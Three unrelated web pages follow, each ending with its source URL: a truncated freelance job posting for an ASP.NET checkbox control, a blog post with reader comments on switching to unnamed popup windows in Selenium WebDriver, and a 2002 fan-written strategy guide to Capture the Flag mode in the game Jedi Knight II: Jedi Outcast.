Project Budget: $30 - $250 USD
Total Bids: 9

Project Description

Need a customized list checkbox control. See attached snapshot. The control has to implement the UserControl and IScriptControl interfaces. It has to be done from scratch; NO DEPENDENT controls are allowed to be used. On the server side ([url removed, login to view]) it has to have a Title getter/setter and a List<FilterItem> Items getter/setter. The FilterItem class is provided below:

public class FilterItem
{
    public string Title { get; set; }
    public string Href { get; set; }
}

On the client side (JavaScript) it has to handle checking/unchecking the checkboxes as well as control collapse/expand, and these should not postback. See the attached image to understand. Also, when the control is generated (Render(...)) into HTML markup, no <table> tag is allowed; pls use <div> and CSS styling to get the
https://www.freelancer.com/projects/ASP-NET/Customized-List-CheckBox-control/
When using Selenium 2.0 (WebDriver) you will sometimes find clicking a link opens a popup window. Before you can interact with the elements on the new window you need to switch to the new window. If the new window has a name you can use the name to switch to the popup window:

    driver.switchTo().window(name);

However, if the window does not have a name you need to use the window handle. The problem is that every time you run the code the window handle will change. So you need to find the window handle for the popup window. To do this I use getWindowHandles() to find all the open windows, I click the link to open the new window. Next I use getWindowHandles() to get a second set of window handles. If I remove all the window handles of the first set from the second set I should end up with a set with only one element. That element will be the handle of the popup window. Here is the code:

    String getPopupWindowHandle(WebDriver driver, WebElement link) {
        // get all the window handles before the popup window appears
        Set<String> beforePopup = driver.getWindowHandles();

        // click the link which creates the popup window
        link.click();

        // get all the window handles after the popup window appears
        Set<String> afterPopup = driver.getWindowHandles();

        // remove all the handles from before the popup window appears
        afterPopup.removeAll(beforePopup);

        // there should be only one window handle left
        if(afterPopup.size() == 1) {
            return (String)afterPopup.toArray()[0];
        }
        return null;
    }

To use this I simply call it with the WebElement which clicking opens the new window. You want to add some error handling to this but the basic idea of finding the popup window is here.
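As an aside, the same set-difference idea carries over almost verbatim to Selenium's Python bindings, where the handles come back from the `window_handles` property. A sketch (the helper name is mine; any driver-like object exposing `window_handles` works, which is also what makes the logic easy to unit-test with a stub):

```python
def get_popup_window_handle(driver, link):
    """Return the handle of the one window opened by clicking `link`, else None."""
    # get all the window handles before the popup window appears
    before = set(driver.window_handles)

    # click the link which creates the popup window
    link.click()

    # whatever handle remains after removing the old ones is the popup
    new = set(driver.window_handles) - before
    return next(iter(new)) if len(new) == 1 else None
```

Usage mirrors the Java version: remember `driver.current_window_handle`, call the helper, then `driver.switch_to.window(handle)`, and switch back when done.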
To use the method I would use:

    String currentWindowHandle = driver.getWindowHandle();
    String popupWindowHandle = getPopupWindowHandle(driver, link);
    driver.switchTo().window(popupWindowHandle);
    // do stuff on the popup window
    // close the popup window
    driver.switchTo().window(currentWindowHandle);

9 comments:

Hi, your approach for handling popups and windows is very helpful for me. Thanks. Happy Testing

Thanks for the input. It helped a lot in switching to a new popup window which has no name.

Hi Darrell, your code works perfectly with a single popup window but I could not use it for multiple popups because of the usage of removeAll(). Can you suggest a solution for multiple popups without using iterator.next(), since it is not consistent on InternetExplorerDriver()? Flow in navigation order: 1. Main Window 2. First Popup Window 3. Second Popup Window 4. First Popup Window 5. Main Window

Shahul, the code helps you to find a new popup window. It is not meant to help you navigate a sequence of popups. Your example is missing some details. If you actually mean:

1. go to main window
2. click something which opens first popup window
3. go to first popup window
4. click something which opens second popup window
5. interact with second popup window
6. close second popup window
7. go to first popup window
8. close first popup window
9. go to main window

My code would be used as follows:

    String mainHandle = driver.getWindowHandle();
    WebElement firstPopup = driver.findElement(...);
    String firstPopupHandle = getPopupWindowHandle(driver, firstPopup); // does click
    driver.switchTo().window(firstPopupHandle);
    WebElement secondPopup = driver.findElement(...);
    String secondPopupHandle = getPopupWindowHandle(driver, secondPopup); // does click
    driver.switchTo().window(secondPopupHandle);
    // interact with second popup window
    // do something to close second window
    driver.switchTo().window(firstPopupHandle);
    // do something to close first window
    driver.switchTo().window(mainHandle);

This assumes that the link/button to create the second popup window is on the first popup window. If you have any more questions, please post them to the WebDriver Google Group. It is easier to have an interactive conversation there.

Thanks a ton. It perfectly worked.

Thanks Darrell for the post. I am having a problem handling popups in my application. I have put SOP(driver.getWindowHandles().size()) before and after the popup is opened, and the value remains 1, so the driver is not getting any popup to switch to. Please help me fix this issue, as it has become a bottleneck for my testing.

Where is getPopupWindowHandle defined?

That's a good approach to handle popups. I'm currently facing a problem with the Flash Player settings. Could you please let me know how to handle that kind of popup? Selenium IDE is not recognizing the actions which I'm doing on that window.
https://darrellgrainger.blogspot.com/2012/04/how-to-find-popup-window-if-it-does-not.html?showComment=1364797989815
Star Wars Jedi Knight II: Jedi Outcast: Capture the Flag FAQ by TripleEej Version: 1.0 | Updated: 2002-04-20 | Original File _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| _ _____ ____ ___ _ ___ _ ___ ____ _ _ _____ ___ ___ | | ____| _ \_ _| | |/ / \ | |_ _/ ___| | | |_ _| |_ _|_ _| _ | | _| | | | | | | ' /| \| || | | _| |_| | | | | | | | | |_| | |___| |_| | | | . \| |\ || | |_| | _ | | | | | | | \___/|_____|____/___| |_|\_\_| \_|___\____|_| |_| |_| |___|___| ____ _____ _____ _____ _ ___ / ___|_ _| ___| | ___/ \ / _ \ | | | | | |_ | |_ / _ \| | | | | |___ | | | _| | _/ ___ \ |_| | \____| |_| |_| |_|/_/ \_\__\_\ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| By: E.J. Downes (TripleEej) Version 1.0 (4/20/2002) _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| Table of Contents 1. Introduction 2. Basics 3. Useful Force Powers 4. Items 5. Map-Specific Strategies 6. Netiquette 7. Strategies From Other People 8. Credit/Props 9. Contact Information _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 1. Introduction If you already know Capture the Flag like the back of your hand, then you may just want to skip this FAQ. This is really intended for the rookie, the upstart...the complete and utter newbie. Anyone that hops around like a baboon on LSD only to get completely destroyed. Now that I've gotten the obligatory monkey reference out of the way, I'll tell you why I wrote this. This more or less started as a thread I made on the JKII Message Board on GameFAQs because I wanted to rant. 
You see, I had played quite a bit of CTF that day and had noticed one thing in particular: ABOUT 80% OF THE PEOPLE THAT PLAY CTF KIND OF SUCK. And it's not because they're bad at FPS games, either. Most of the time it just comes down to the fact that they play CTF like they would play a Free For All...they just try to kill people. Now, killing people is a very essential part of CTF. However, so is...well...CAPTURING THE FLAG. It's a simple concept, really. One that I'm surprised so few people understand. Still, it's a problem that needs to be addressed. So, as a public service to all of us (or not, depending on if you like totally 0wning people or not :) ), here is my FAQ for JK:JO CTF.

 _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|

2. Basics

You win by getting the flag back to base more than the other guy, but you can only score if your flag is at base.

One or two people should be the "Flag Runner/Carriers". These people do nothing but go after the other team's flag. The others should be either helping the Runner/Carrier, or defending the base. A successful game means that everybody does ALL these things, not just one or two of them. I've had single games where I capped flags, defended the base, and helped out the carrier.

To get the flag, you usually have to be:

-HELPED BY TEAMMATES! I've gotten plenty of captures by myself, but they're about a million times easier if I have someone that has my back.

-Good at running. If you don't have Force Speed at Level 3, forget about flag running. Just forget about it. Go defend the flag instead. Or support the flag carrier. Or pick up and never use vital items for the team (more on that later...) Or go to Taco Bell.

-Sneaky. Running in guns-a-blazing doesn't work too well if the other team doesn't completely suck. The easiest way to get the flag is if they don't see you going for it until you have it already.
If you are NOT the Flag Runner, then either HELP the Flag Runner or defend your flag. If you see the Flag Runner, get behind him and run backwards, shooting at anybody chasing the Carrier. Try to take shots for him--you are his personal Secret Service. :)

If both teams have each other's flag, there are 3 basic roles the team must assume:

-Flag Carrier: The flag carrier has a simple task: don't get killed! This is best accomplished by avoiding encounters with the enemy, and just running. However, if you're already back at your base, DON'T just run and hop around like a jackass. Monopolize the health and shields areas (your teammates don't need them--they'll respawn at base anyway so they won't be far away). Also, ATTACK anyone harassing you! Even though you have the flag, you are not some helpless little idiot. No doubt you probably have the best weapons (since you pretty much ran the length of the level twice) so you have the most potential to kick some ass! Finally, DO NOT go after the other Flag Carrier for ANY REASON! Even if you beat them, you still have to go all the way back to base again, and your flag can be re-stolen in the meantime.

-Flag Defender: If everyone is off trying to get the flag back, the Flag Carrier is screwed. Have at least a couple of people PROTECT the flag! Ideally these people should be the best at "0wning" people, because in most situations they WILL be outnumbered. If you have light powers, use Team Heal on your carrier a lot, because he will need the help.

-Flag Attacker: Alternatively, don't have everyone just sitting defending the Flag Carrier! You don't score points by defending (well, not for the team anyway). These people should probably be the best ones at just wreaking major havoc with rocket launchers and whatever that "Flak Cannon" thing is called. Scare the opposing Flag Carrier. Force them to make a mistake. Push them off a ledge. And focus ONLY on them.
Don't go running off fighting one of the Flag Defenders--they'll just respawn at their base anyway! -Most of the times I've seen the other team (on on rare occasion, my team ;) ) get trashed at CTF is when they failed to divvy up the team like this. _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ |_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____| 3. Useful Force Powers Some Force powers are MADE for CTF. They make captures and defenses a LOT easier: -Force Speed: This is your best friend. Always have it on Level 3 if you can. Flag Running becomes a whole lot easier if you can run faster than anyone else. This is also useful for catching up to an opposing Flag Carrier and beating them down. -Force Pull: A defender's best friend. The lazy man's way of catching up with an opposing carrier. Also useful for screwing up people's jumps in places like Nar Shaddaa. -Force Push: Like Pull, it can really screw up people's jumps. It can also be used by defenders to push Flag Runners away from the Flag before they take it. Finally, it will send projectiles back towards whomever shot them! -Team Heal: This is a team game, right? RIGHT? Use this on your Carrier during those tense moments where both teams have each other's flags. -Force Grip: The way to piss people off. :) Grip the carrier and hack 'em to bits, or move them over a cliff and let go. -Force Jump: Useful for getaways, but only really needed in levels like Nar Shaddaa. The Achilles' heel of Force Jump is Force Push and Force Pull, because it's really easy to get thrown around when you're in midair. Still, give it at least one level because some shortcuts require a higher jump than the standard one. 
-Force Heal: In my opinion, it's really just better to use bacta or have someone else Team Heal you (you only really need healing if you have the flag in CTF). Not only does it eat up Force power and not give a lot in return (health only, not shields), but there is also a delay of about a second before it works, and you can get killed before it kicks in (I know I have, anyway. :) )

-Jedi Mind Trick: This Force power makes you invisible to a certain number of people, depending on what level it is on. Level 3 makes you invisible to the entire other team, but you must have one of them in your sights to activate it.

-Force Lightning: It sure looks impressive, but the damage/Force consumption ratio is a bit high. It's still better than in JK1, where a single wussy bolt shot out, though. Somewhat useful when combined with Force Grip in levels without pits.

-Dark Rage: It's hard to kill someone that has Dark Rage on. Dark Rage minimizes damage taken and speeds up everything you do. However, the cost is that it almost completely eats away at your health (and you can't pick up more health while it's active), and when it does wear off, you get sluggish. If you see someone with Dark Rage, either push them off a ledge, completely barrage them with explosive weapons, or just wait until it wears off and finish them with the weakest lightsaber strike. Dark Rage becomes very lethal when combined with Speed, as you will go faster than either one can manage by itself.

-Force Seeing: If you know someone is using Jedi Mind Trick, allocate some points to this so you can see them. Otherwise it's not terribly useful.

-Force Drain: This is a valuable power to have if you defend. If the other team steals your flag, use it on their Flag Carrier so that their getaway will be harder. Also useful for Dark Side Carriers when they are running low on health, because it turns their Force energy into health for you.

-Force Protect: Turns physical damage into Force damage.
It's fine until you run out of Force and get killed. Don't bother.

-Force Absorb: Takes Force power used against you and adds it to your Force meter, and also negates the effect. Cool, huh? It will suck down your Force energy, though. Turn it off when you don't use it.

-Force Team Energize: Only useful if you're around the Flag Carrier. It'll restore other people's Force energy in return for your own energy, so give it to the Carrier so they can re-activate their Force Speed.

 _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|

4. Items

This is where I get ultra-ranty. Too many players do not know about the other items in the game. This is bad for two reasons:

1. All of the items are extremely useful in CTF, and
2. The players will PICK THEM UP ANYWAY JUST BECAUSE THEY ARE THERE, and then THEY WILL NEVER USE THE DAMN THINGS, MAKING ME WAIT FOR THE ITEMS TO RESPAWN!!!!!

Whew. :)

To use an item, hit the bracket keys [ and ] to scroll through the items, and hit Enter to use them. Here are the items and why I want you to use them if you pick them up:

-Bacta Tanks: A travel-sized Force Heal for the masses! Use this when you're almost out of health, as it will completely refill it in multiplayer. B is the default hot-key. Flag Carriers should always have this.

-Assault Sentry: Probably the Flag Defender's best friend. This is an automatic turret that will fire on any enemy that it sees. The best place to put these is in heavily travelled doorways near the flag, as it also gets in the way of would-be enemy Flag Carriers.

-That cute little ball that shoots lasers: Remember that little ball that floated and shot at Luke when Obi-Wan was training him with the saber? Haha, that thing nailed Luke good, the little whiny... Anyways, this thing floats around your head for a limited time, shooting at any enemy it sees.
This makes saber combat a lot easier, as your foe will spend time blocking the potshots it takes...until they get run through with your saber. :)

-Force Enlightenment: This will give you all the powers on your side of the Force at their top levels. Useful if you didn't quite put enough on Grip. Note: do not confuse this with Force Boon--you do not have unlimited Force energy!

-Force Boon: THIS one gives you temporary unlimited Force energy. This should be in the Flag Carrier's possession for obvious reasons. NOTE: this will not add to your Force energy if you have Speed, Absorb, Sight, Rage, etc. on. It only adds back to your Force energy when you AREN'T using a power.

-Stationary Shield: I saved this for last because it's my favorite item. What this does is put up a big flat shield that only members of your team can cross. This is what the Flag Carrier should have in levels like Yavin, because it will completely stop anyone from chasing you. This is also good for stopping the enemy Flag Carrier in Yavin by running in front of them and deploying it, thus making them have to either turn around and find another way out, or try and smash through it while you kill them. :)

 _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|

5. Map-specific Strategies

-Nar Shaddaa (Warring Factions): Take the high road if you want to get to the flag. Too many people spawn on the lower passages, and it's very easy to get pushed or pulled off by someone above you. Try to kill enemy Flag Carriers before they make it to the middle of the map. The Flechette is very useful to Flag Defenders. If you snipe, there had better be someone else closer to the flag defending, as it is almost impossible to catch up to an enemy Flag Carrier from the best place to snipe (right under the huge Imperial/New Republic emblems).
Force powers you NEED: Speed, Push, Pull, Jump, Grip
Useful Force powers: Absorb, Drain

-Bespin (Bespin Exhaust Shafts): The best route I've found is NOT to cross the bridges in the middle. It's laughably easy to toss anyone off these. How should you get through there, then? First, take the way out of your base where you go down the stairs to where a couple of shield powerups are. Keep going straight and Force Jump into the little alcove in the enemy's base where the Thermal Detonators are (further in there's the zig-zaggy corridor, if that helps you get a picture at all). The most effective way to return is to then Force Jump across the gap to the little rectangular window where the sniper rifle is. You will have to hold down crouch and forward in order to fit inside of it, but you will have an almost guaranteed capture if you actually make it through. Stick the Assault Sentry right in the doorway to the flag platform to slow down enemy Flag Carriers. Only get tangled in the mess in the middle if you're a defender that wants to prevent the enemy from even entering your base. Either that or do what I do--wait in the doorway yourself, and whenever the enemy tries to go in, Force Pull them so they fall down, and then kill them however you like to kill people. :)

Force powers you NEED: Speed, Push, Jump (if you want to try my shortcut)
Useful Force powers: Drain, Team Heal, Lightning

-Garrison 27-D: Take the high road on the catwalks, but don't go straight down the middle all the way. Make a right at the halfway point, then a left, and go through both doors to make flag capture MUCH easier. This level is probably the one where it's most likely BOTH flags will have been taken, so this is also where all of Part 1 comes into play (and also the reason I bothered to write all this up). There's a powerup that will give 200 shields just to the left (if you're facing the other team's base) near the big entrance to your base. Let the Flag Carrier have this.
You will respawn in the same area if you die, but if the Carrier dies then the other team will more likely than not score. Don't be selfish about this. :)

If you're the Flag Carrier, hanging around your base when both teams have the flag is a good way to get killed, because the other team will be rushing over there to get you, and there really isn't that much room to run away. Find a quiet spot somewhere in the level that isn't TOO far away should your teammates get your flag back. You'd be surprised how quickly the other team can "re-acquire" your flag if you dawdle.

Force powers you NEED: Speed (Notice a pattern?), Pull, Team Heal
Useful Force powers: Jump, Grip

-Yavin (Temple Tournament): Flag Carriers trying to flee by going out the slow-opening doors in the middle of the base are likely to get a rocket up their behind. Go out one of the side doors, and deploy a Stationary Shield to keep people from chasing you. This is my favorite level because I can usually do this loop several times easily. If you're defending, place Trip Mines around the flag so that it will take at least two attackers to successfully get the flag, and stick some on the side entrances too if you have any. Make sure you let your own team know they're there, though (team chat is the letter T)! On that note, make sure that there are at least two of you going for the flag at any time. Use the mines effectively. I had one poor guy guessing all the time because I would mine different parts of the base. A good place to mine is the side doors, because Flag Runners seem to prefer those doors to the slow-opening middle door. Also, it seems like 90% of the time the door they will come through is the one to the left (the one with the stationary shield and the repeater behind it). I don't know why, but it's true. If you're defending, a good tactic if someone gets the flag is to watch which side door they head towards, then go through the slow-opening middle door and head them off.
Yes, this route will end up being faster despite the door, and you will catch the Runner by surprise because he will think everyone is BEHIND him. If you really want to be a sneaky bastard about it, quickly lay down a couple of Remote Mines and detonate them when he comes. :)

Force powers you NEED: Speed, Pull, Drain, Team Heal
Useful Force powers: Push, Grip
Definitely useful item: Stationary Shield

 _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|

6. Netiquette

I figure I might as well have a PSA about this, too. Some people really need to read this (well okay, MOST people do...)

Don't whine about losing, or how your team sucks, or how TripleEej uses cheap tactics on Yavin. Nobody likes a crybaby.

There is no Uber-weapon or Uber-power. Everything can be countered in the game. Saturday night I saw someone whine about how they were gonna play FFA, because there's "no one weapon wonders there like (name omitted)." If you keep falling victim to the same thing over and over, then maybe YOU should figure out how to counter it. Either that, or start using the tactic yourself. I sure didn't make up the shield tactic on Yavin--I saw someone else do it to me and I thought it was a good idea (no idea who it was, though, or I'd give credit where credit's due).

Don't badmouth your team. If they're doing something wrong, don't just say they all suck--TELL them what they should do. Why do you think I went to the trouble of writing this? :)

Compliment your enemy if they do something that caught you totally off-guard. It's not much, but it helps lighten the mood.

Ask the other team what they did differently if you completely got trashed. Most people are more than willing to share their strategies with you.

Don't boast excessively. Especially not if you just spent the whole time engaging people in combat. CTF doesn't stand for "Kill The F'ers" because "Kill" starts with K, silly!
;)

Don't switch teams just because they are winning. That's what sore losers do. You're not a sore loser, are you?

Have fun, of course. Raven didn't make JK2 to piss you off. If you don't like the way things are going, switch servers or play the single player or go watch Hentai, you Hentai-watching freak!

 _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|

7. Strategies From Other People

I'm certainly not the definitive person to ask about CTF. Plenty of other people have good strategies. If you don't like mine, maybe some of these are better.

NOTE: Most of this is compiled from the CTF Mini-FAQ thread on the JKII message board. I only included strategies that don't sound redundant compared to my FAQ (as it stands now--I've revised a few things since I originally wrote it). All names are usernames from the GameFAQs message board.

From Tommatt:

"I agree ppl need to read this. Ppl don't understand that you can't score if your flag isn't at your base. I've played many games where I go through all the work to get the flag back to base, and I'm holding on to it for over 5 minutes, because nobody bothers to kill their guy with our flag. I'm basically screaming at the team at this point. It happens quite often, as I seem adept at sneaking into the base and getting back with the flag. One game my opponent had the same problem, so if we each had the flag for over 3 minutes, we'd take turns getting killed so that somebody could score LOL. But definitely get in a defensive position. Don't engage in combat unless you have to. Get up on some high ground; when somebody jumps at you, push 'em down--they'll go to where your teammates should be. Use your Force powers to your advantage. I use Dark side so I have Drain; if I see somebody coming I always use Drain even if I don't need health--steal their Force power before they can use it on you. If all else fails, run to a new defensive position.
Your teammates should help. The main thing I see the newbies doing is just engaging anybody in combat. If the other team has your flag, don't engage somebody in the middle of the map--push them down, keep running, get to the opposing Flag Carrier!"

"When running back with a flag, pre-plan your route if possible, and always try to pick a route that has med powerups, shield powerups, and canisters, and always have a force field item on you when you grab a flag. Dropping it at the right time will delay pursuers greatly. I try to have a forcefield on me when I get the flag, and hope one has respawned on my way back."

From silentbill515:

"Couple of other things that everyone needs to know. DON'T JOIN A TEAM JUST BECAUSE THEY ALREADY HAVE A GOOD LEAD!!!! Just do Join Game and let it put you where it needs you. I had a 6-on-2 the other day. I ran around for over 5 minutes with our flag before I got overpowered. I looked to see where my team was, and it turns out it was just me and one other. Keep the teams somewhat even. It's a video game, not game 7 of the Stanley Cup finals with the series all tied up and you're in the 4th overtime!

Sabers do have a place: deflections. I've killed a LOT of people by running at them with my saber and just deflecting shots.

If you're the Flag Runner, make sure you have Heal & Speed. These are your best friends (Light only, of course). If you're Dark, then grab bacta tanks. Not as easy as the Light side, but it can still be done."

From PSFreak:

"Let's face it. Every game with a CTF mode has problems. Most people are complete and utter dumb asses when something requires teamwork. There are always a few freelancers that think they can do everything, and they get shot down for it. I must say that I have always liked to be a runner in all CTFs, and I have learned that you just have to be able to rely on yourself."
From SeTSwiPe:

"Speed R3 vs Rage

I didn't have a stopwatch (stupid cell phones making me think I don't need a watch), so I had to make do with a quartz metronome. At R3, Speed is faster than Rage. Of course, I've only tested with R3 Speed as of now. How much is it faster by? Not by very much. I tested this in Nar Shaddaa by putting myself up against the wall near the cantina and counting the number of metronome ticks it took to reach the other wall. It was only 1 tick or so. As far as which is better for CTF, it's up to you really. Rage does have the distinct advantage of faster RoF and reduced damage, so it might even out. My advice: decide by the level. If the stage is fairly open, I'd suggest Speed so you can run faster. If it's more corridor-like, I'd suggest Rage--you'll have an easier time if you have a gun like the repeater firing faster.

Speed/Rage vs Rockets

I tested by shooting the rocket and seeing if I could catch it. Both R3 Speed and Rage couldn't keep up. I did also notice that even if it's going forward, one can Push the rocket so it moves in another direction. I cannot tell if it's a random direction, or if it goes toward the nearest opponent, since there were no opponents in the room. But since I've found this trick, I've added a new test to my list.

Lightning

I haven't officially tested it, but the more I play online, the more I believe that it poisons you at a constant rate no matter what rank. I will also have to test to see whether multiple Lightnings from different opponents add damage or not."

"Rage

Great for defense, mostly because of the increased RoF. Imagine explosives coming out at double the RoF.

Speed/Rage

At R3 Speed, you run faster than normal when in the slowdown. It's slower than Rage, but still faster than normal. So a strat for running would be Rage, then changing to Speed during the cooldown."

From CrazyBallz:

"rage3 vs speed3 Rage cost about 40% of ur force bar wen its full... and can pretty much catch up to speed3... not to sure...
cuz people like to zigzag... but wen they run straight and ur following straight from behind with rage you have good chance to catch up and possibly overtake them... as far as i figure for ctf... rage + speed will get the job done... get the flag... hit rage... run like no tomorrow... =) then wen slowmoness begins hit force speed... well after that ur pretty much running a tad bit faster then normal... the sucky part is you have no mana..."

"ohh yeah guys dont say to balance out the teams when you have people TKing the other side to help you out... thats wack... i figure its pretty balanced if the other team can score a point or two... is our fault if you dont have runners going in and out... people enjoy the game... guys chill with the smack talk if u really dont do neting... kinda gets annoying especially if your talking to your own teamates..."

"well since your making a CTF guide... you can put this for uber defense.... =)

For Light side... for force level Jedi Knight...
JUMP level 3
PUSH level 3
PULL level 3
Speed level 1 to 3 (if possible)
ABSORB level 3
Protect level 1 to 3 (3 if Jedi Master)
Mind Trick level 3
Saber level 1
Saber Defense level 3

well this build dominates for Nar Shadaa and Bespin for the Imperial level and Yavin... just walk around with a rocket launcher... that will pretty much do it for uber defensiveness...

For Dark Side
JUMP level 3
PUSH level 3
PULL level 3
Speed level 1 to 3 (if possible)
RAGE level 3
Drain level 1 to 3 (3 if Jedi Master)
Grip level 3
Saber level 1
Saber Defense level 3

same tactic as above but then you have grip for yavin and imperial... and if you do have drain... drain a person whos gunna get the flag it will screw them up so badly... its not even funnie... plus repeater has a sick rate of fire with rage.... ohhh the best way to catch up to a flag runner is speed3 and rage3... ull catch up to neone... in a matter of seconds... so just blast away... dont 4get the best defense is a good offense... own the other sides team..
and u wont have a problem... =)"

From whoomp:

"Just thought I'd add my two cents :) One thing to consider when thinking about Rage vs Speed is the lack of Light powers you'll be missing out on by choosing a Dark side ability. I find abilities like Protection, Heal, and Absorb invaluable for flag capturing. More often than not the flag capturer is a Light side user, not a Dark side one. On ledge-happy maps (Nar Shaddaa and Bespin come to mind), I'd rather have Absorb to counter Grip/Drain than just Push alone. I can't count the number of times people chase me with Speed/Drain, only to fill my meter so I can heal almost constantly :) Heal/Protection also helps sustain life those extra few seconds to make the cap, or for your defenders to deal with the threat. Rage is a lot better for anti-flag captures, with the added speed/RoF (why you can shoot guns faster than normal, I'm not sure).

Right now, my favorite tactic is being the 1-man diversion. I'll usually max Absorb/Heal/Push and just stall. It's amazing how many people will try to stack the odds. In a 7-on-7 CTF game, I had 5 members of the opposing team chasing me constantly. That left the bulk of my team to overpower the 2 remaining members and cap the flag. The basic idea is to just defend, and only attack when you have an extremely clear lightsaber shot. Absorb should be on, since there's almost always 1-2 guys that'll try to Lightning/Grip you despite you having Absorb on. This'll keep your Force up for a while so you can heal and Push the occasional gun toter's explosive shots. Roll around a lot if there are only lightsaber users chasing you (just don't roll INTO your opponent). You'll live 10x longer if you can keep rolling around. You won't live forever, but I've kept people tied up for 4-5 minutes sometimes :)"

From CBrate:

"Just one pet peeve of mine. If your team has a couple of first-timers and other assorted newbs that ask questions (like me), answer them.
It's better to have a halfway decent team than to pride oneself on owning everyone else and still losing."

 _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|

8. Credit/Props

While I did write a lot of this on a whim one day, I never really thought too seriously of submitting it until I got the response. As it stands, I believe the thread for this FAQ has the most posts on the GameFAQs message board, and everyone has been really supportive, whether they agreed with me or not. ;)

First off, I have to give Activision/LucasArts/Raven Software some major props for making such an awesome game. I haven't been so absorbed in a FPS since the original Jedi Knight.

These people definitely stand out when I think of this FAQ, though:

Tommatt--The first person to reply to my thread, and certainly one of the more enthusiastic ones about keeping it at the top of the list. Thank you!

SeTSwiPe--Probably the one that caused me to rethink and change my strategies the most. I've since experimented with (and removed the degrading comments about ;) ) the Light Side, and he's the one that got me curious about this whole Dark Rage deal. I would have never tried Rage/Speed so quickly if it weren't for him.

CrazyBallz--The only one of these three that I've actually managed to play with for a significant amount of time. Gave SeTSwiPe a hard time since he started posting on the thread, and proved to be almost as big of a dork as him with his *FORCE SPAM PUSH* ;)

 _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____
|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|_____|

9. Contact Information

Got a strategy for CTF that you think is awesome? Like the CTF? Hate the CTF? Hate me when you get (cheaply) killed by me? Think I'm a LAMER? Contact me!

GameFAQs message board thread: I'm TripleEej. You can tell because I've posted the most.
E-mail: down0095@tc.umn.edu
In JKII multiplayer: Search for TripleEej. I'll most likely be in a CTF server if I'm on. ;)

Thank you for reading this!
http://www.gamefaqs.com/pc/516547-star-wars-jedi-knight-ii-jedi-outcast/faqs/16742